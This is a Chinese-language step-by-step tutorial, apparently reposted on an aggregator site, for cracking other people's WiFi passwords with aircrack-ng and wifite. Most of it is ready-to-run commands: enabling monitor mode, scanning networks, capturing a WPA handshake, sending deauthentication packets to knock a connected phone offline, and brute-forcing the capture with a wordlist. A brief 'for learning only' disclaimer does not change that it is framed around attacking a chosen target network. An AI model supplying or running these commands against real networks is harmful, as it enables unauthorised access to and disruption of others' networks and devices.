admin管理员组

文章数量:1606855

破解 WiFi,获取 WiFi 密码

  • 破解 WiFi,获取 WiFi 密码
    • 手动指令破解篇
      • 1.查看自己的无线网卡名称
      • 2.开启网卡监听模式
      • 3.搜索周围wifi网络
      • 4.抓取握手包
      • 5.干扰连接设备重连
      • 6.暴力破解握手包
    • 自动破解篇
      • 使用 wifite 工具

破解 WiFi,获取 WiFi 密码

此处为 Linux 系统篇,Windows 系统也可以安装类似的工具进行破解,暴力跑包的时间普遍较长,该文章内容仅供学习参考,并不是引导大家去破解他人的 WiFi 密码

手动指令破解篇

安装配置:

  • 需要安装 aircrack-ng
  • 需要打开两个终端,一个用来监听,一个用来干扰连接获取必要数据

1.查看自己的无线网卡名称

# 查看自己的WiFi显卡驱动名称,一般以w开头,我这边是wlan0
sudo airmon-ng
# 出现为以下结果
PHY     Interface       Driver          Chipset
phy0    wlan0          rtl8723be       Realtek Semiconductor Co., Ltd. RTL8723BE PCIe Wireless Network Adapter

2.开启网卡监听模式

# 开启无线网卡的监听模式
sudo airmon-ng start wlan0

3.搜索周围wifi网络

开启监听模式之后的网卡就会在自己的网卡名称后面加上 mon ,也就是 网卡名称+mon 这种形式

# 使用自己开启监听的网卡驱动对周围的wifi进行扫描,使用 Ctrl+c 停止扫描,扫描适当时间即可停止
sudo airodump-ng wlan0mon

停止后,记住自己要破解的 WiFi 的 BSSID 以及 CH

BSSID 密码破解中会使用上

4.抓取握手包

使用网卡的监听模式抓取周围的无线网络数据包,其中我们需要用到的数据包是包含了 WiFi 密码的握手包,当有新用户连接 WiFi 时会发送握手包

# 代码中的 CH 和 BSSID 填写你要破解 wifi 的内容即可
sudo airodump-ng -c CH --bssid [BSSID] -w [保存数据目录]  [网卡驱动名称]
# 例:  我要破解的wifi BSSID 为 DC:FE:18:1B:42:6B  CH 为 13,代码如下
sudo airodump-ng -c 13 --bssid DC:FE:18:1B:42:6B -w ~/hs wlan0mon

参数:

  • -c 指定信道
  • -bssid 指定 BSSID
  • -w 指定抓取数据包保存的目录

5.干扰连接设备重连

注意: 需要在第四步监听到一个设备连接上

使用命令给连接段发送一个反认证包,使手机强制断开连接,随后它会自动再次连接 WiFi

此时需要打开另外一个终端,输入指令

# BSSID 和 STATION 皆为监听到设备的信息
sudo aireplay-ng -0 2 -a [BSSID] -c [STATION] [网卡驱动名称]
# 例:  监听到设备的 BSSID 为 DC:FE:18:1B:42:6B ,STATION 为 50:01:D9:7E:F0:3F
aireplay-ng -0 2 -a DC:FE:18:1B:42:6B -c 50:01:D9:7E:F0:3F wlan0mon

参数:

  • -a 指定 BSSID
  • -c 指定 STATION ,也就是 MAC 地址

干扰设备重连后,可以在监听窗口的终端查看到抓取到的握手包,这时使用 Ctrl+c 停止抓包,并结束无线网卡的监听模式

# 结束无线网卡的监听模式
sudo airmon-ng stop wlan0mon

6.暴力破解握手包

# 暴力跑包破解密码
sudo aircrack-ng -a2 -b [BSSID] -w [密码本] [握手包]
# 例,监听设备的 BSSID 为 DC:FE:18:1B:42:6B,密码本为 password.txt, 握手包路径为 ~/hs/-01.cap
sudo aircrack-ng -a2 -b DC:FE:18:1B:42:6B -w password.txt ~/hs/-01.cap

参数:

  • -b 指定 BSSID
  • -w 指定密码本

自动破解篇

使用 wifite 工具

其实应该名为 半自动化破解

安装配置:

  • 需要安装 aircrack-ng

  • 需要安装 wifite

# 使用 wifite 软件
sudo wifite

启动成功后出现自动化扫描周围的 WiFi,扫描到适应的时间后使用 Ctrl+c 停止扫描即可

扫描结果为: 序号 WiFi名称

输入序号自动进行破解,当然,这个破解也是需要有设备对该 WiFi 进行连接才能进行破解

破解方式为 获取 ping 码,进行对应的 ping 码解密,ping 码解密失败后,就会进行暴力跑包解密

本文标签: 密码wifi

版权声明:本文标题:破解 WiFi,获取 WiFi 密码 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://www.elefans.com/xitong/1728515392a1161764.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。